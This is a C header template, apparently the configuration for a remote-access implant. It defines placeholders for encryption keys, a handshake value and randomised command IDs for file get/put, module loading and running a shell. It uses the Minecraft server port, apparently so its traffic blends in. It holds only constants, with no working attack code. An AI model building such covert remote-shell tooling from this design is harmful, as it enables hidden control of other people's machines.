#pragma once

#include <stdint.h>

// Keys.
#define KEY_LENGTH 32
#define IV_LENGTH 16
static const uint8_t COMMUNICATION_KEY[KEY_LENGTH] = {/*communication_key: 32 random uint8*/};
static const uint8_t COMMUNICATION_IV[IV_LENGTH] = {/*communication_iv: 16 random uint8*/};

// Handshake.
static const uint64_t HANDSHAKE = /*handshake: 1 random uint64*/;

// Connection.
// Unofficial Minecraft (Java Edition) multiplayer server TCP port.
static const int PORT = 25565;

// Commands.
static const uint64_t DISCONNECT_COMMAND_ID = 0;
static const uint64_t ADD_MODULE_COMMAND_COMMAND_ID = 1;
static const uint64_t REMOVE_MODULE_COMMAND_COMMAND_ID = 2;
static const uint64_t GET_FILE_COMMAND_ID = /*get_file_command_id: 1 random uint64*/;
static const uint64_t PUT_FILE_COMMAND_ID = /*put_file_command_id: 1 random uint64*/;
static const uint64_t RUN_SHELL_COMMAND_ID = /*run_shell_command_id: 1 random uint64*/;
